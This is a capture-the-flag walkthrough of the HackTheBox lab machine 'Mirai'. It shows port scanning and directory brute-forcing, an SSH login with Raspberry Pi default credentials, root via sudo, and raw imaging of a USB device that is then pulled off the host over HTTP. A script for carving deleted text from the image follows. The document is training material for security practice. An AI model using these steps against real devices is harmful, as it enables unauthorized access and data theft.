Mirai HTB
IP
10.10.10.48
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.48 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ','
we have the following ports open
22,53,80,1255,32400,32469
Let's run a more in-depth scan (default scripts plus version detection) of the target's open ports
sudo nmap -sCV -p22,53,80,1255,32400,32469 10.10.10.48 -oA nmap_results
results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1255/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
|_http-favicon: Plex
|_http-title: Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looks like we have two web servers, on ports 80 (lighttpd 1.4.35) and 32400 (Plex Media Server).
DNS is open on port 53. A zone transfer is worth a try, but note the service is dnsmasq 2.76, which is a lightweight forwarder/cache rather than an authoritative server, so AXFR is unlikely to work.
Ports 1255 and 32469 are Platinum UPnP 1.0.5.13. UPnP (Universal Plug and Play) is a networking protocol that lets compliant devices discover each other and set port-forwarding rules for themselves; these two listeners most likely belong to Plex's DLNA server.
Zone transfer on DNS port 53: come back to this.
Let's check out the web server on port 80.
We are brought to a blank page

but the Server header confirms the lighttpd version
1.4.35
Let's run feroxbuster and see if we can find anything else
feroxbuster -u http://10.10.10.48 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt
We find `http://10.10.10.48/admin/`, which turns out to be a Pi-hole admin interface

Worth looking into when we finish enumerating
We also find `http://10.10.10.48/versions`, which serves a text file containing version numbers with no labels:
,v3.1.4,v3.1,v2.10
The file itself doesn't say what these are; given the Pi-hole admin page, they are most likely the versions of Pi-hole's components (core, web interface, FTL), but that is an assumption.
**HTTP PORT 32400**
When we navigate to http://10.10.10.48:32400
we see the following

Let's see if some feroxbusting finds anything
feroxbuster -u http://10.10.10.48:32400 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt
We get 200s for everything. That looks less like a security control and more like a catch-all route: the Plex web app answers every path with the same page, so status codes alone tell us nothing. Filtering responses by size (feroxbuster's -S/--filter-size on the size of the catch-all page) would separate real paths from the noise.
Let's try creating an account and inspect the request with Burp.
Account creation fails: the application keeps rejecting the password.
So far our best bet is the Pi-hole interface we found at http://10.10.10.48/admin/.
What is Pi-hole: a network-wide ad blocker that works as a DNS sinkhole; its primary purpose is to block unwanted content at the DNS level.
Pi-hole is most often installed on a Raspberry Pi, which suggests the target is a Raspberry Pi IoT device.
A quick search confirms that Raspbian ships with a well-known default user, that SSH is frequently left enabled (port 22 is open here), and that the default credentials are
pi: raspberry
Let's see if we can SSH into the machine with them
ssh pi@10.10.10.48
we now have access as pi on the target machine

When we check our sudo privileges we can see the following
sudo -l

so we can simply run
sudo su
and we are root.
Now let's find the root flag.
When we cat root.txt we see the following message instead of a flag
cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Looking in the /media/usb
we can see the following note

The note says the files were deleted. Deleting a file on a typical Linux filesystem only unlinks it; its data blocks stay on the device until they are reused, so instead of looking at the mounted filesystem we image the raw block device (/dev/sdb here; confirm with mount or lsblk which device backs /media/usb) and enumerate it on our local machine.
sudo dd if=/dev/sdb of=/home/pi/disk.img bs=1M
cd /home/pi
python3 -m http.server 9001
Now we can download it onto our local machine
wget http://10.10.10.48:9001/disk.img
Now we can run strings over the image to pull out any printable text still sitting in unallocated blocks
strings disk.img
The output is noisy (every live file and any old data on the stick shows up too), but the flag is in there; searching the output for a 32-character hex token narrows it down quickly.
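The same carving step as a script, so the hit does not have to be found by eye. This is an added example for this walkthrough, not code from the original notes or from any HTB tooling: it reproduces what `strings` does (runs of printable bytes with their offsets) and filters the runs for a 32-hex-character token, the shape of an HTB flag. The sample image is constructed in memory; the block layout, the note text and the flag value are all made up, and the 512-byte block size is an assumption.

```python
"""Carve deleted text out of a raw disk image (added example, constructed data)."""
import mmap
import re
import sys

BLOCK = 512            # assumed sector size of the sample image
MIN_RUN = 4            # strings(1) default minimum run length
FLAG = re.compile(rb"\b[0-9a-f]{32}\b")   # 32 hex chars, the shape of an HTB flag


def build_sample_image(blocks: int = 64) -> bytes:
    """Fake raw device (constructed test data, not the box's /dev/sdb): zeroed
    blocks, some pseudo-random filler, one live file and one deleted file whose
    bytes survive in an unallocated block."""
    img = bytearray(BLOCK * blocks)
    # Block 3: a note that is still a live file on the filesystem (made-up text).
    note = b"note.txt: sorry, I wiped the stick before taking the backup\n"
    img[3 * BLOCK:3 * BLOCK + len(note)] = note
    # Blocks 10-12: deterministic LCG filler standing in for old overwritten data.
    x = 12345
    for i in range(10 * BLOCK, 13 * BLOCK):
        x = (1103515245 * x + 12345) & 0xFFFFFFFF
        img[i] = (x >> 16) & 0xFF
    # Block 40: contents of a file that was rm'd. Unlinking frees the inode and
    # block map; the data itself stays until something reuses the block.
    deleted = b"root.txt (deleted): 0123456789abcdef0123456789abcdef\n"
    img[40 * BLOCK:40 * BLOCK + len(deleted)] = deleted
    return bytes(img)


def carve_strings(image, min_run: int = MIN_RUN):
    """Yield (offset, run) for every printable-ASCII run of at least min_run
    bytes, i.e. what `strings -t d` prints. Works on bytes or an mmap."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_run)
    for m in pat.finditer(image):
        yield m.start(), m.group()


def find_flags(image):
    """Return [(absolute_offset, flag)] for every 32-hex token in the image.
    Absolute offsets let a hit be mapped back to a block (offset // BLOCK)."""
    hits = []
    for off, run in carve_strings(image):
        for m in FLAG.finditer(run):
            hits.append((off + m.start(), m.group().decode()))
    return hits


def main(argv):
    if len(argv) > 1:
        # Real use: the disk.img pulled over with wget. mmap avoids reading a
        # multi-GB image into memory; re works directly on the mapping.
        with open(argv[1], "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as image:
            hits = find_flags(image)
            total = sum(1 for _ in carve_strings(image))
    else:
        image = build_sample_image()
        hits = find_flags(image)
        total = sum(1 for _ in carve_strings(image))
    for off, flag in hits:
        print(f"offset {off} (block {off // BLOCK}): {flag}")
    print(f"{total} printable runs in total; {len(hits)} flag-shaped")


if __name__ == "__main__":
    main(sys.argv)
```

Run it with no arguments to see the constructed image carved, or with `disk.img` as the argument against the real copy. Before trusting anything carved from the copy, compare sha256sum of disk.img on the Pi and on the local machine: an HTTP transfer that was interrupted silently truncates the image, and the flag could be in the part that never arrived.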